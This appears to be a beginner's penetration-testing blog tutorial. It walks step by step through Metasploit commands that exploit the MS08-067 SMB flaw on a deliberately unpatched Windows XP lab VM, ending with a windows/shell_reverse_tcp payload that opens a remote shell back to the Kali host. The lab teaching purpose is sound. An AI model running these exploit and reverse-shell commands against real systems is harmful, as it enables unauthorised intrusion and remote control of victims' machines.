Metasploit Basics for Beginners - Exploiting Windows XP (MS08–067) with Metasploit (Kali Linux)  - Part 1

We will be going through the basics of using Metasploit to exploit Windows XP machine using MS08–067 vulnerability in this article.

Setup Used for Practicing Metasploit Basics:

1) Install latest version of Virtualbox based on your host o/s from (https://www.virtualbox.org/wiki/Downloads)

2) Download and install Kali Linux 2018.2 ISO as Virtualbox VM and set Networking to Bridged mode for this VM.

3) Buy and Install a Fresh Windows XP SP2 ISO with no updates installed as Virtualbox VM and set Networking to Bridged mode for this VM.

4) It is recommended to confirm if Windows XP VM we have installed is Missing ms08–067 Update — (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) and if you found this update installed, kindly uninstall this update.

We need Kali Linux 2018.2 as Kali comes with Metasploit Framework pre-installed.

We need Target Windows machine to explore the steps involved in using Metasploit to exploit MS08–067: Vulnerability in Server Service Could Allow Remote Code Execution (https://www.cvedetails.com/cve/CVE-2008-4250/)

Starting Metasploit Framework in Kali VM:

1) Start the PostgreSQL database with the following command in Kali Terminal

service postgresql start

 

2) Now we can start the Metasploit service with the following command in Kali Terminal

service metasploit start

3) Once metasploit service has started now we can start metasploit text based console with the following command in Kali Terminal

msfconsole

Basics of Metasploit Framework via exploitation of ms08–067 vulnerability in Windows XP VM:

1) Metasploit search command usage

We will use search command to search for if any module available in metasploit for vulnerability in focus which is ms08–067, hence enter the following command in kali terminal

search ms08–067

2) Metasploit Info command usage

Now in order to gather detailed information about available metasploit module for ms08–067 vulnerability, we will enter the following command in kali terminal

Info exploit/windows/smb/ms08_067_netapi

The key features to be noticed from info command results are mentioned below:

Platform, Rank, Privileged, Available Targets, Basic Options, Payload Information etc.

Platform — Target Operating Systems in which this module will work like windows or linux or android

Rank — Always recommended to choose exploits with a better ranking like Excellent or Great.

Privileged — Gives idea if this module will provide or need high privileges on the Target

Available Targets — Lists all possible targets that can be exploited by this module

Basic Options — Lists the options which can be set before using this module against the target. Allowing the user to customize various basic options based on attacker needs. It informs us of the mandatory options which need to be set for the module to run.

Payload Information — Lists the information which helps us decide which are payloads that are compatible with a specific exploit because payloads help us in post exploitation once the target is in our control.

3) Metasploit use command usage

Once we confirm the specific metasploit module (exploit) to use, we can execute the command below to use the specific exploit available for ms08–067 vulnerability.

use windows/smb/ms08_067_netapi

4) Setting up the Module Options in Metasploit

Once you have chosen specific exploit, enter the following command to list all options available for this exploit module and also notice the column Required in image below, It is mandatory to fill the options where the value of Required is yes.

show options

5) Setting RHOST to Target Windows XP VM IP Address

IP Address of Windows XP VM (Found by entering ipconfig command in cmd of Windows XP VM).

In Kali Terminal enter the command below to set RHOST as Windows XP VM

Set RHOST 192.168.0.8

 

Now we can go ahead and change other options available such as RPORT and SMBPIPE to user defined values as per our need but for the sake of following through this article, we will leave all other options as default values set works fine for this exploit.

6) Using an Available Target for specific Metasploit Module

Now we can enter the command mentioned below to list all available targets for our (ms08_067_netapi) module

show targets

 

We can set specific target based on operating system our target is running by entering the command below:

set Target (Target Number)

 

But in this tutorial, we will leave the default option of Automatic Targeting.

7) Selecting and using any of Compatible Payloads for this Exploit module

Enter the following command in terminal to list all compatible payloads available for this exploit.

show payloads

 

Now we can set any of best payloads, let’s say windowsàshell_reverse_tcp by using the command below

set payload windows/shell_reverse_tcp

8) Setting up Payload Options before exploitation

show options

 

Enter the above command in terminal to view the options set for Payload and Module. We have already set the necessary options for module, now since our payload is a reverse shell, we need to set value for LHOST option to Kali Linux by using command mentioned below:

set LHOST 192.168.0.7

9) Exploiting the Target with Metasploit

Now enter the exploit command in terminal now to get a command shell on our Target.

10) Proof of Exploitation

Now we can execute some of windows commands to get information regarding the compromised machine using commands systeminfo and ipconfig as shown below:

 

Stay Tuned, we will explore Post Exploitation with Metasploit (Meterpreter Basics) in Part 2 of this article.

Was this post helpful?

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Barath is an Information Security Analyst at Astra. Passionate about Offensive Security, when he isn’t glued to a computer screen, he spends his time playing Video Games or watching movies. He is currently exploring Penetration Testing on his path to achieving OSCP.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close